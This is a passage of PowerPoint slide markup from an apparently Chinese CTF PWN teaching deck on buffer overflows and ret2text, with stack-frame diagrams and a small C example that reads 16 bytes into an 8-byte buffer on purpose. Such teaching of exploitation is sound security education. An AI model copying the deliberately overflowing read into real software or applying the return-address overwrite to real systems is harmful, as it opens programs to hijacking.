                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>指向攻击指令，需要哪些准备？首先，在退栈过程中，返回地址会被传给 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，所以我们只需要让溢出数据用攻击指令的地址来覆盖返回地址就可以了。其次，我们可以在溢出数据内包含一段攻击指令，也可以在内存其他位置寻找可用的攻击指令。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57831AC0-1B47-4D33-BC42-9E8780D373E2}"/>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6955016" y="1337623"/>
            <a:ext cx="4648849" cy="4363059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA8779BD-8090-4AD4-813C-AFEB35FB4A34}"/>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ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2172587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D0C481B-D494-47C5-8F71-186891DAC39B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2848997" y="2708299"/>
            <a:ext cx="6469487" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>栈溢出</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Stack overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:p>
            <a:pPr marL="1200150" lvl="2"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最常见、漏洞比例最高、危害最大的二进制漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CTF PWN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中往往是漏洞利用的基础</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堆溢出（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Heap overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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a:p>
            <a:pPr marL="1200150" lvl="2"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堆管理器复杂，利用花样繁多</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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CTF PWN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中的常见题型</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Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>段溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2"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攻击效果依赖于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>段</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上存放了何种控制数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB38616A-CA48-491F-8D7F-2091DCF2F185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201331" y="1520186"/>
            <a:ext cx="4600490"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缓冲区溢出（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Buffer overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">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C0C52FDD-EB67-4B53-B15A-93780AD31B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2201331" y="2160409"/>
            <a:ext cx="8451643" cy="369332"/>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本质是向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>定长的缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中写入了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>超长的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，造成超出的数据覆写了合法内存区域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F4C1899-CC07-4BE6-B38E-A4E92CB71A6B}"/>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ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33559275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Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C8EFC1-AADF-4D52-A09B-1EAE6F2088A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2465957" y="2177046"/>
            <a:ext cx="3181980" cy="1342106"/>
            <a:chOff x="1797175" y="2320925"/>
            <a:chExt cx="2537400" cy="1161971"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 648">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8C155EB-71F4-4F63-9BC3-879B2F186BD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2320925"/>
              <a:ext cx="2537400" cy="274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return address</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B4C9F3D-FBDA-4376-97B2-D7EFD3888AB8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2595125"/>
              <a:ext cx="2537400" cy="2742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stack frame pointer</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Shape 650">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020559D6-C4E0-4B01-848E-38DCC0CB1A20}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2865875"/>
              <a:ext cx="2537400" cy="489297"/>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local variables</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>buf</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Shape 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D328E740-EA37-48D4-B4D5-24459C945E81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="3355172"/>
              <a:ext cx="2537400" cy="127724"/>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42" name="文本框 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F43A3F6-30C7-4FC4-97CD-0062A1EBF90D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309234" y="1420600"/>
            <a:ext cx="1107996"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栈溢出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B6075B8-B87E-4086-B36F-B820E5E68CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2177046"/>
            <a:ext cx="3181981" cy="1342106"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>{</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US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>[8];        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>read(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>, 16);</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Shape 646">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8620865-4103-47E3-BF99-162ACC0B60D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2465956" y="4227843"/>
            <a:ext cx="3181983" cy="1342106"/>
            <a:chOff x="1797173" y="2320925"/>
            <a:chExt cx="2537402" cy="1161971"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Shape 648">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8058C4A4-18F0-4891-A6CA-2E09369A3DC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2320925"/>
              <a:ext cx="2537400" cy="274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DDDD</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Shape 620">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4227550-B0E5-49E9-88E2-0CC328226EB9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="2595125"/>
              <a:ext cx="2537400" cy="2742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CCCC</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Shape 650">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C00044-7DE2-424C-B616-C475C0722513}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797173" y="2865875"/>
              <a:ext cx="2537402" cy="23627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BBBB</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Shape 651">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E1C2579-6FA2-4DCF-A024-F08B3C64ED4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1797175" y="3355172"/>
              <a:ext cx="2537400" cy="127724"/>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51" name="Shape 129">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00FD534D-3ACD-44EC-B154-D8AB63ACC254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4227843"/>
            <a:ext cx="3181981" cy="1342106"/>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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>{</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US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
